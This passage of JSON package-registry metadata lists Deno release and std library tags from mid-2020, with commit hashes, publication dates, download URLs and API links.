sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://githu